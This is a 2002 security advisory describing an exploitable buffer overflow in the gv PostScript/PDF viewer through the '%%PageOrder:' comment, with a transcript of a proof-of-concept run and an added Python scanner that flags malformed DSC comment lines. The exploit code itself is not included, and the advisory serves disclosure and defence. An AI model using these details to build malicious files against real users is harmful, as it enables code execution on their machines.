27th Sep 2002 [SBWID-5714]
COMMAND

	Exploitable Buffer Overflow in gv

SYSTEMS AFFECTED

	This vulnerability affects the latest version of gv, 3.5.8. An exploit
	has been tested on Red Hat Linux 7.3.

PROBLEM

	An issue exclusively disclosed to iDEFENSE by zen-parse
	[zen-parse@gmx.net], iDEFENSE Security Advisory [09.26.2002]:
	
	--snipp--
	
	In order to perform exploitation, an attacker would have to trick a
	user into viewing a malformed PDF or PostScript file from the command
	line. This may be somewhat easier for Unix-based email programs that
	associate gv with email attachments. Since gv is not normally installed
	setuid root, an attacker would only be able to cause arbitrary code to
	run with the privileges of that user. Other programs that utilize
	derivatives of gv, such as ggv or kghostview, may also be vulnerable in
	similar ways.
	
	A proof of concept exploit for Red Hat Linux designed by zen-parse is
	attached to this message. It packages the overflow and shellcode in the
	"%%PageOrder:" section of the PDF.
	
	[root@victim]# ls -al /tmp/itworked 
	/bin/ls: /tmp/itworked: No such file or directory 
	[root@victim]# gv gv-exploit.pdf 
	[root@victim]# ls -al /tmp/itworked 
	-rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
	[root@victim]# 
	
	
	--snapp--
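	
	The advisory places the overflow in the "%%PageOrder:" comment. As an
	added example (not part of the advisory and not gv code), the Python
	check below flags DSC comment lines that break the DSC 3.0 limits
	(255-character lines; a %%PageOrder value of Ascend, Descend, Special
	or (atend)), as a pre-filter before a file reaches a viewer. The
	function name and both sample inputs are constructed for illustration.

```python
import re

MAX_DSC_LINE = 255  # DSC 3.0 line-length limit, excluding the line terminator
PAGE_ORDER_VALUES = {b"Ascend", b"Descend", b"Special", b"(atend)"}
KEY = b"%%PageOrder:"


def scan_dsc_comments(data: bytes) -> list:
    """Return (line_number, reason) findings for suspicious DSC comment lines."""
    findings = []
    for lineno, line in enumerate(re.split(rb"\r\n|\r|\n", data), start=1):
        if not line.startswith(b"%%"):
            continue  # only DSC comments are checked; other content is skipped
        if len(line) > MAX_DSC_LINE:
            findings.append((lineno, "overlong DSC comment: %d bytes" % len(line)))
        if any((b < 0x20 and b != 0x09) or b > 0x7E for b in line):
            findings.append((lineno, "non-printable bytes in DSC comment"))
        if line.startswith(KEY):
            value = line[len(KEY):].strip()
            if value not in PAGE_ORDER_VALUES:
                findings.append((lineno, "unexpected PageOrder value"))
    return findings


# Constructed sample: a well-formed DSC header.
BENIGN = (b"%!PS-Adobe-3.0\r\n%%Creator: example\r\n"
          b"%%PageOrder: Ascend\r\n%%EndComments\r\n")

# Constructed sample: inert filler in the PageOrder value, no payload.
MALFORMED = (b"%!PS-Adobe-3.0\n%%PageOrder: " + b"A" * 400 + b"\x80\x01\n"
             b"%%EndComments\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        hits = scan_dsc_comments(sample)
        print(name, "clean" if not hits else hits)
```

	A file that produces any finding can be quarantined rather than
	handed to gv or a derivative such as ggv or kghostview.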
	

SOLUTION

	No patch. Change viewer?